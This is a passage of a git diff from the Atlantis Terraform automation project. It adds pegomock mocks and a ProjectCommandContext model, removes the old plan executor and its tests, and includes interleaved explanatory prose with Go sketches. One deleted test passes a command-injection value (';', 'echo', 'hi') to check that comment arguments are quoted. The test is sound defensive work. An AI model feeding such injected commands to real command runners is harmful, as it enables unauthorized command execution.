+ _param1[u] = param.(models.PullRequest)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierWorkingDir) DeleteForWorkspace(r models.Repo, p models.PullRequest, workspace string) *WorkingDir_DeleteForWorkspace_OngoingVerification {
+ params := []pegomock.Param{r, p, workspace}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "DeleteForWorkspace", params)
+ return &WorkingDir_DeleteForWorkspace_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WorkingDir_DeleteForWorkspace_OngoingVerification struct {
+ mock *MockWorkingDir
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WorkingDir_DeleteForWorkspace_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) {
+ r, p, workspace := c.GetAllCapturedArguments()
+ return r[len(r)-1], p[len(p)-1], workspace[len(workspace)-1]
+}
+
+func (c *WorkingDir_DeleteForWorkspace_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.Repo, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.Repo)
+ }
+ _param1 = make([]models.PullRequest, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(models.PullRequest)
+ }
+ _param2 = make([]string, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(string)
+ }
+ }
+ return
+}
diff --git a/server/events/mocks/mock_working_dir_locker.go b/server/events/mocks/mock_working_dir_locker.go
new file mode 100644
index 0000000000..c6feb51680
--- /dev/null
+++ b/server/events/mocks/mock_working_dir_locker.go
@@ -0,0 +1,127 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: WorkingDirLocker)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+)
+
+type MockWorkingDirLocker struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockWorkingDirLocker() *MockWorkingDirLocker {
+ return &MockWorkingDirLocker{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockWorkingDirLocker) TryLock(repoFullName string, workspace string, pullNum int) (func(), error) {
+ params := []pegomock.Param{repoFullName, workspace, pullNum}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock", params, []reflect.Type{reflect.TypeOf((*func())(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 func()
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(func())
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockWorkingDirLocker) Unlock(repoFullName string, workspace string, pullNum int) {
+ params := []pegomock.Param{repoFullName, workspace, pullNum}
+ pegomock.GetGenericMockFrom(mock).Invoke("Unlock", params, []reflect.Type{})
+}
+
+func (mock *MockWorkingDirLocker) VerifyWasCalledOnce() *VerifierWorkingDirLocker {
+ return &VerifierWorkingDirLocker{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockWorkingDirLocker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierWorkingDirLocker {
+ return &VerifierWorkingDirLocker{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockWorkingDirLocker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierWorkingDirLocker {
+ return &VerifierWorkingDirLocker{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierWorkingDirLocker struct {
+ mock *MockWorkingDirLocker
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierWorkingDirLocker) TryLock(repoFullName string, workspace string, pullNum int) *WorkingDirLocker_TryLock_OngoingVerification {
+ params := []pegomock.Param{repoFullName, workspace, pullNum}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock", params)
+ return &WorkingDirLocker_TryLock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WorkingDirLocker_TryLock_OngoingVerification struct {
+ mock *MockWorkingDirLocker
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WorkingDirLocker_TryLock_OngoingVerification) GetCapturedArguments() (string, string, int) {
+ repoFullName, workspace, pullNum := c.GetAllCapturedArguments()
+ return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1]
+}
+
+func (c *WorkingDirLocker_TryLock_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]string, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(string)
+ }
+ _param1 = make([]string, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(string)
+ }
+ _param2 = make([]int, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(int)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierWorkingDirLocker) Unlock(repoFullName string, workspace string, pullNum int) *WorkingDirLocker_Unlock_OngoingVerification {
+ params := []pegomock.Param{repoFullName, workspace, pullNum}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Unlock", params)
+ return &WorkingDirLocker_Unlock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WorkingDirLocker_Unlock_OngoingVerification struct {
+ mock *MockWorkingDirLocker
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WorkingDirLocker_Unlock_OngoingVerification) GetCapturedArguments() (string, string, int) {
+ repoFullName, workspace, pullNum := c.GetAllCapturedArguments()
+ return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1]
+}
+
+func (c *WorkingDirLocker_Unlock_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]string, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(string)
+ }
+ _param1 = make([]string, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(string)
+ }
+ _param2 = make([]int, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(int)
+ }
+ }
+ return
+}
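
Besides the last call, the generated `GetAllCapturedArguments` methods return the arguments of every recorded invocation, which is handy when a method runs once per workspace. A sketch (names and values invented), assuming pegomock's `Times`, `AnyString`, and `AnyInt` matchers:

```go
package events_test

import (
	"testing"

	. "github.com/petergtz/pegomock"
	"github.com/runatlantis/atlantis/server/events/mocks"
)

func TestWorkingDirLockerMock_CaptureAll(t *testing.T) {
	RegisterMockTestingT(t)
	locker := mocks.NewMockWorkingDirLocker()

	// Unstubbed calls return zero values (nil unlock func, nil error)
	// but are still recorded by the mock.
	locker.TryLock("owner/repo", "default", 1)
	locker.TryLock("owner/repo", "staging", 1)

	// Verify both invocations and inspect every captured argument.
	_, workspaces, _ := locker.VerifyWasCalled(Times(2)).
		TryLock(AnyString(), AnyString(), AnyInt()).
		GetAllCapturedArguments()
	if len(workspaces) != 2 || workspaces[1] != "staging" {
		t.Fatalf("got workspaces %v", workspaces)
	}
}
```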
diff --git a/server/events/models/models.go b/server/events/models/models.go
index 7344fd28e2..db4eb1c820 100644
--- a/server/events/models/models.go
+++ b/server/events/models/models.go
@@ -24,8 +24,14 @@ import (
"time"
"github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
)
+// DefaultWorkspace is the name of the default workspace, used by both
+// Atlantis and Terraform.
+const DefaultWorkspace = "default"
+
// Repo is a VCS repository.
type Repo struct {
// FullName is the owner and repo name separated
@@ -123,6 +129,7 @@ const (
)
// User is a VCS user.
+// During an autoplan, the user will be the Atlantis API user.
type User struct {
Username string
}
@@ -153,9 +160,16 @@ type Project struct {
// Path to project root in the repo.
// If "." then project is at root.
// Never ends in "/".
+ // TODO: rename to RepoRelDir to match the rest of the project. We can't
+ // do that yet because this field is also how projects are stored in
+ // BoltDB, so renaming it would break existing databases.
Path string
}
+func (p Project) String() string {
+ return fmt.Sprintf("repofullname=%s path=%s", p.RepoFullName, p.Path)
+}
+
// Plan is the result of running an Atlantis plan command.
// This model is used to represent a plan on disk.
type Plan struct {
@@ -205,3 +219,25 @@ func (h VCSHostType) String() string {
}
return ""
}
+
+// ProjectCommandContext defines the context for running plan or apply
+// against a single project.
+type ProjectCommandContext struct {
+ // BaseRepo is the repository that the pull request will be merged into.
+ BaseRepo Repo
+ // HeadRepo is the repository that is getting merged into the BaseRepo.
+ // If the pull request branch is from the same repository then HeadRepo will
+ // be the same as BaseRepo.
+ // See https://help.github.com/articles/about-pull-request-merges/.
+ HeadRepo Repo
+ Pull PullRequest
+ // User is the user that triggered this command.
+ User User
+ Log *logging.SimpleLogger
+ RepoRelDir string
+ ProjectConfig *valid.Project
+ GlobalConfig *valid.Config
+
+ // CommentArgs are the extra arguments appended to the comment,
+ // e.g. atlantis plan -- -target=resource.
+ CommentArgs []string
+ Workspace string
+}
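
For concreteness, here is roughly what a `ProjectCommandContext` could look like for a comment such as `atlantis plan -d mydir -w staging -- -target=foo`. All values below are illustrative, not taken from the diff:

```go
package main

import (
	"fmt"

	"github.com/runatlantis/atlantis/server/events/models"
	"github.com/runatlantis/atlantis/server/logging"
)

func main() {
	ctx := models.ProjectCommandContext{
		BaseRepo:    models.Repo{FullName: "owner/repo"}, // repo the PR merges into
		HeadRepo:    models.Repo{FullName: "owner/repo"}, // same when the PR isn't from a fork
		User:        models.User{Username: "someuser"},   // hypothetical user
		Log:         logging.NewNoopLogger(),
		RepoRelDir:  "mydir",   // from the -d flag
		Workspace:   "staging", // from the -w flag
		CommentArgs: []string{"-target=foo"}, // everything after --
		// ProjectConfig and GlobalConfig stay nil when there's no atlantis.yaml.
	}
	fmt.Println(ctx.RepoRelDir, ctx.Workspace)
}
```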
diff --git a/server/events/models/models_test.go b/server/events/models/models_test.go
index 0dbb4f49ff..5883f21936 100644
--- a/server/events/models/models_test.go
+++ b/server/events/models/models_test.go
@@ -92,3 +92,10 @@ func TestNewRepo_HTTPSAuth(t *testing.T) {
Name: "repo",
}, repo)
}
+
+func TestProject_String(t *testing.T) {
+ Equals(t, "repofullname=owner/repo path=my/path", (models.Project{
+ RepoFullName: "owner/repo",
+ Path: "my/path",
+ }).String())
+}
diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go
deleted file mode 100644
index 478de10a22..0000000000
--- a/server/events/plan_executor.go
+++ /dev/null
@@ -1,148 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-import (
- "fmt"
- "os"
- "path/filepath"
-
- "github.com/pkg/errors"
- "github.com/runatlantis/atlantis/server/events/locking"
- "github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/events/run"
- "github.com/runatlantis/atlantis/server/events/terraform"
- "github.com/runatlantis/atlantis/server/events/vcs"
-)
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator
-
-// LockURLGenerator consumes lock URLs.
-type LockURLGenerator interface {
- // SetLockURL takes a function that given a lock id, will return a url
- // to view that lock.
- SetLockURL(func(id string) (url string))
-}
-
-// atlantisUserTFVar is the name of the variable we execute terraform
-// with, containing the vcs username of who is running the command
-const atlantisUserTFVar = "atlantis_user"
-
-// PlanExecutor handles everything related to running terraform plan.
-type PlanExecutor struct {
- VCSClient vcs.ClientProxy
- Terraform terraform.Client
- Locker locking.Locker
- LockURL func(id string) (url string)
- Run run.Runner
- Workspace AtlantisWorkspace
- ProjectPreExecute ProjectPreExecutor
- ProjectFinder ProjectFinder
-}
-
-// PlanSuccess is the result of a successful plan.
-type PlanSuccess struct {
- TerraformOutput string
- LockURL string
-}
-
-// SetLockURL takes a function that given a lock id, will return a url
-// to view that lock.
-func (p *PlanExecutor) SetLockURL(f func(id string) (url string)) {
- p.LockURL = f
-}
-
-// Execute executes terraform plan for the ctx.
-func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse {
- cloneDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace)
- if err != nil {
- return CommandResponse{Error: err}
- }
-
- var projects []models.Project
- if ctx.Command.Dir == "" {
- // If they didn't specify a directory to plan in, figure out what
- // projects have been modified so we know where to run plan.
- modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull)
- if err != nil {
- return CommandResponse{Error: errors.Wrap(err, "getting modified files")}
- }
- ctx.Log.Info("found %d files modified in this pull request", len(modifiedFiles))
- projects = p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, cloneDir)
- if len(projects) == 0 {
- return CommandResponse{Failure: "No Terraform files were modified."}
- }
- } else {
- projects = []models.Project{{
- Path: ctx.Command.Dir,
- RepoFullName: ctx.BaseRepo.FullName,
- }}
- }
-
- var results []ProjectResult
- for _, project := range projects {
- ctx.Log.Info("running plan for project at path %q", project.Path)
- result := p.plan(ctx, cloneDir, project)
- result.Path = project.Path
- results = append(results, result)
- }
- return CommandResponse{ProjectResults: results}
-}
-
-func (p *PlanExecutor) plan(ctx *CommandContext, repoDir string, project models.Project) ProjectResult {
- preExecute := p.ProjectPreExecute.Execute(ctx, repoDir, project)
- if preExecute.ProjectResult != (ProjectResult{}) {
- return preExecute.ProjectResult
- }
- config := preExecute.ProjectConfig
- terraformVersion := preExecute.TerraformVersion
- workspace := ctx.Command.Workspace
-
- // Run terraform plan.
- planFile := filepath.Join(repoDir, project.Path, fmt.Sprintf("%s.tfplan", workspace))
- userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username)
- planExtraArgs := config.GetExtraArguments(ctx.Command.Name.String())
- tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, planExtraArgs...), ctx.Command.Flags...)
-
- // Check if env/{workspace}.tfvars exist.
- envFileName := filepath.Join("env", workspace+".tfvars")
- if _, err := os.Stat(filepath.Join(repoDir, project.Path, envFileName)); err == nil {
- tfPlanCmd = append(tfPlanCmd, "-var-file", envFileName)
- }
- output, err := p.Terraform.RunCommandWithVersion(ctx.Log, filepath.Join(repoDir, project.Path), tfPlanCmd, terraformVersion, workspace)
- if err != nil {
- // Plan failed so unlock the state.
- if _, unlockErr := p.Locker.Unlock(preExecute.LockResponse.LockKey); unlockErr != nil {
- ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
- }
- return ProjectResult{Error: fmt.Errorf("%s\n%s", err.Error(), output)}
- }
- ctx.Log.Info("plan succeeded")
-
- // If there are post plan commands then run them.
- if len(config.PostPlan) > 0 {
- absolutePath := filepath.Join(repoDir, project.Path)
- _, err := p.Run.Execute(ctx.Log, config.PostPlan, absolutePath, workspace, terraformVersion, "post_plan")
- if err != nil {
- return ProjectResult{Error: errors.Wrap(err, "running post plan commands")}
- }
- }
-
- return ProjectResult{
- PlanSuccess: &PlanSuccess{
- TerraformOutput: output,
- LockURL: p.LockURL(preExecute.LockResponse.LockKey),
- },
- }
-}
diff --git a/server/events/plan_executor_test.go b/server/events/plan_executor_test.go
deleted file mode 100644
index 24e5452c9b..0000000000
--- a/server/events/plan_executor_test.go
+++ /dev/null
@@ -1,291 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events_test
-
-import (
- "errors"
- "testing"
-
- "github.com/mohae/deepcopy"
- . "github.com/petergtz/pegomock"
- "github.com/runatlantis/atlantis/server/events"
- "github.com/runatlantis/atlantis/server/events/locking"
- lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks"
- "github.com/runatlantis/atlantis/server/events/mocks"
- "github.com/runatlantis/atlantis/server/events/models"
- rmocks "github.com/runatlantis/atlantis/server/events/run/mocks"
- tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks"
- vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
- "github.com/runatlantis/atlantis/server/events/vcs/mocks/matchers"
- "github.com/runatlantis/atlantis/server/logging"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-var planCtx = events.CommandContext{
- Command: &events.Command{
- Name: events.Plan,
- Workspace: "workspace",
- Dir: "",
- },
- Log: logging.NewNoopLogger(),
- BaseRepo: models.Repo{},
- HeadRepo: models.Repo{},
- Pull: models.PullRequest{},
- User: models.User{
- Username: "anubhavmishra",
- },
-}
-
-func TestExecute_ModifiedFilesErr(t *testing.T) {
- t.Log("If GetModifiedFiles returns an error we return an error")
- p, _, _ := setupPlanExecutorTest(t)
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn(nil, errors.New("err"))
- r := p.Execute(&planCtx)
-
- Assert(t, r.Error != nil, "exp .Error to be set")
- Equals(t, "getting modified files: err", r.Error.Error())
-}
-
-func TestExecute_NoModifiedProjects(t *testing.T) {
- t.Log("If there are no modified projects we return a failure")
- p, _, _ := setupPlanExecutorTest(t)
- // We don't need to actually mock VCSClient.GetModifiedFiles because by
- // default it will return an empty slice which is what we want for this test.
- r := p.Execute(&planCtx)
-
- Equals(t, "No Terraform files were modified.", r.Failure)
-}
-
-func TestExecute_CloneErr(t *testing.T) {
- t.Log("If AtlantisWorkspace.Clone returns an error we return an error")
- p, _, _ := setupPlanExecutorTest(t)
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
- When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).ThenReturn("", errors.New("err"))
- r := p.Execute(&planCtx)
-
- Assert(t, r.Error != nil, "exp .Error to be set")
- Equals(t, "err", r.Error.Error())
-}
-
-func TestExecute_DirectoryAndWorkspaceSet(t *testing.T) {
- t.Log("Test that we run plan in the right directory and workspace if they're set")
- p, runner, _ := setupPlanExecutorTest(t)
- ctx := deepcopy.Copy(planCtx).(events.CommandContext)
- ctx.Log = logging.NewNoopLogger()
- ctx.Command.Dir = "dir1/dir2"
- ctx.Command.Workspace = "workspace-flag"
-
- When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace-flag")).
- ThenReturn("/tmp/clone-repo", nil)
- When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "dir1/dir2"})).
- ThenReturn(events.PreExecuteResult{
- LockResponse: locking.TryLockResponse{
- LockKey: "key",
- },
- })
- r := p.Execute(&ctx)
-
- runner.VerifyWasCalledOnce().RunCommandWithVersion(
- ctx.Log,
- "/tmp/clone-repo/dir1/dir2",
- []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/dir1/dir2/workspace-flag.tfplan", "-var", "atlantis_user=anubhavmishra"},
- nil,
- "workspace-flag",
- )
- Assert(t, len(r.ProjectResults) == 1, "exp one project result")
- result := r.ProjectResults[0]
- Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
- Equals(t, "", result.PlanSuccess.TerraformOutput)
- Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
-}
-
-func TestExecute_AddedArgs(t *testing.T) {
- t.Log("Test that we include extra-args added to the comment in the plan command")
- p, runner, _ := setupPlanExecutorTest(t)
- ctx := deepcopy.Copy(planCtx).(events.CommandContext)
- ctx.Log = logging.NewNoopLogger()
- ctx.Command.Flags = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""}
-
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
- When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace")).
- ThenReturn("/tmp/clone-repo", nil)
- When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
- ThenReturn(events.PreExecuteResult{
- LockResponse: locking.TryLockResponse{
- LockKey: "key",
- },
- })
- r := p.Execute(&ctx)
-
- runner.VerifyWasCalledOnce().RunCommandWithVersion(
- ctx.Log,
- "/tmp/clone-repo",
- []string{
- "plan",
- "-refresh",
- "-no-color",
- "-out",
- "/tmp/clone-repo/workspace.tfplan",
- "-var",
- "atlantis_user=anubhavmishra",
- // NOTE: extra args should be quoted to prevent an attacker from
- // appending malicious commands.
- "\"-target=resource\"",
- "\"-var\"",
- "\"a=b\"",
- "\";\"",
- "\"echo\"",
- "\"hi\"",
- },
- nil,
- "workspace",
- )
- Assert(t, len(r.ProjectResults) == 1, "exp one project result")
- result := r.ProjectResults[0]
- Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
- Equals(t, "", result.PlanSuccess.TerraformOutput)
- Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
-}
-
-func TestExecute_Success(t *testing.T) {
- t.Log("If there are no errors, the plan should be returned")
- p, runner, _ := setupPlanExecutorTest(t)
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
- When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
- ThenReturn("/tmp/clone-repo", nil)
- When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
- ThenReturn(events.PreExecuteResult{
- LockResponse: locking.TryLockResponse{
- LockKey: "key",
- },
- })
-
- r := p.Execute(&planCtx)
-
- runner.VerifyWasCalledOnce().RunCommandWithVersion(
- planCtx.Log,
- "/tmp/clone-repo",
- []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"},
- nil,
- "workspace",
- )
- Assert(t, len(r.ProjectResults) == 1, "exp one project result")
- result := r.ProjectResults[0]
- Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
- Equals(t, "", result.PlanSuccess.TerraformOutput)
- Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
-}
-
-func TestExecute_PreExecuteResult(t *testing.T) {
- t.Log("If DefaultProjectPreExecutor.Execute returns a ProjectResult we should return it")
- p, _, _ := setupPlanExecutorTest(t)
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
- When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
- ThenReturn("/tmp/clone-repo", nil)
- projectResult := events.ProjectResult{
- Failure: "failure",
- }
- When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
- ThenReturn(events.PreExecuteResult{ProjectResult: projectResult})
- r := p.Execute(&planCtx)
-
- Assert(t, len(r.ProjectResults) == 1, "exp one project result")
- result := r.ProjectResults[0]
- Equals(t, "failure", result.Failure)
-}
-
-func TestExecute_MultiProjectFailure(t *testing.T) {
- t.Log("If is an error planning in one project it should be returned. It shouldn't affect another project though.")
- p, runner, locker := setupPlanExecutorTest(t)
- // Two projects have been modified so we should run plan in two paths.
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"path1/file.tf", "path2/file.tf"}, nil)
- When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
- ThenReturn("/tmp/clone-repo", nil)
-
- // Both projects will succeed in the PreExecute stage.
- When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path1"})).
- ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key1"}})
- When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path2"})).
- ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key2"}})
-
- // The first project will fail when running plan
- When(runner.RunCommandWithVersion(
- planCtx.Log,
- "/tmp/clone-repo/path1",
- []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/path1/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"},
- nil,
- "workspace",
- )).ThenReturn("", errors.New("path1 err"))
- // The second will succeed. We don't need to stub it because by default it
- // will return a nil error.
- r := p.Execute(&planCtx)
-
- // We expect Unlock to be called for the failed project.
- locker.VerifyWasCalledOnce().Unlock("key1")
-
- // So at the end we expect the first project to return an error and the second to be successful.
- Assert(t, len(r.ProjectResults) == 2, "exp two project results")
- result1 := r.ProjectResults[0]
- Assert(t, result1.Error != nil, "exp err to not be nil")
- Equals(t, "path1 err\n", result1.Error.Error())
-
- result2 := r.ProjectResults[1]
- Assert(t, result2.PlanSuccess != nil, "exp plan success to not be nil")
- Equals(t, "", result2.PlanSuccess.TerraformOutput)
- Equals(t, "lockurl-key2", result2.PlanSuccess.LockURL)
-}
-
-func TestExecute_PostPlanCommands(t *testing.T) {
- t.Log("Should execute post-plan commands and return if there is an error")
- p, _, _ := setupPlanExecutorTest(t)
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
- When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
- ThenReturn("/tmp/clone-repo", nil)
- When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
- ThenReturn(events.PreExecuteResult{
- ProjectConfig: events.ProjectConfig{PostPlan: []string{"post-plan"}},
- })
- When(p.Run.Execute(planCtx.Log, []string{"post-plan"}, "/tmp/clone-repo", "workspace", nil, "post_plan")).
- ThenReturn("", errors.New("err"))
-
- r := p.Execute(&planCtx)
-
- Assert(t, len(r.ProjectResults) == 1, "exp one project result")
- result := r.ProjectResults[0]
- Assert(t, result.Error != nil, "exp plan error to not be nil")
- Equals(t, "running post plan commands: err", result.Error.Error())
-}
-
-func setupPlanExecutorTest(t *testing.T) (*events.PlanExecutor, *tmocks.MockClient, *lmocks.MockLocker) {
- RegisterMockTestingT(t)
- vcsProxy := vcsmocks.NewMockClientProxy()
- w := mocks.NewMockAtlantisWorkspace()
- ppe := mocks.NewMockProjectPreExecutor()
- runner := tmocks.NewMockClient()
- locker := lmocks.NewMockLocker()
- run := rmocks.NewMockRunner()
- p := events.PlanExecutor{
- VCSClient: vcsProxy,
- ProjectFinder: &events.DefaultProjectFinder{},
- Workspace: w,
- ProjectPreExecute: ppe,
- Terraform: runner,
- Locker: locker,
- Run: run,
- }
- p.LockURL = func(id string) (url string) {
- return "lockurl-" + id
- }
- return &p, runner, locker
-}
diff --git a/server/events/project_command_builder.go b/server/events/project_command_builder.go
new file mode 100644
index 0000000000..456825f0c2
--- /dev/null
+++ b/server/events/project_command_builder.go
@@ -0,0 +1,236 @@
+package events
+
+import (
+ "fmt"
+
+ "github.com/hashicorp/go-version"
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/vcs"
+ "github.com/runatlantis/atlantis/server/events/yaml"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
+)
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_command_builder.go ProjectCommandBuilder
+
+// ProjectCommandBuilder builds the per-project contexts that plan and apply
+// commands execute in.
+type ProjectCommandBuilder interface {
+ BuildAutoplanCommands(ctx *CommandContext) ([]models.ProjectCommandContext, error)
+ BuildPlanCommand(ctx *CommandContext, commentCommand *CommentCommand) (models.ProjectCommandContext, error)
+ BuildApplyCommand(ctx *CommandContext, commentCommand *CommentCommand) (models.ProjectCommandContext, error)
+}
+
+// DefaultProjectCommandBuilder is the default implementation of
+// ProjectCommandBuilder.
+type DefaultProjectCommandBuilder struct {
+ ParserValidator *yaml.ParserValidator
+ ProjectFinder ProjectFinder
+ VCSClient vcs.ClientProxy
+ WorkingDir WorkingDir
+ WorkingDirLocker WorkingDirLocker
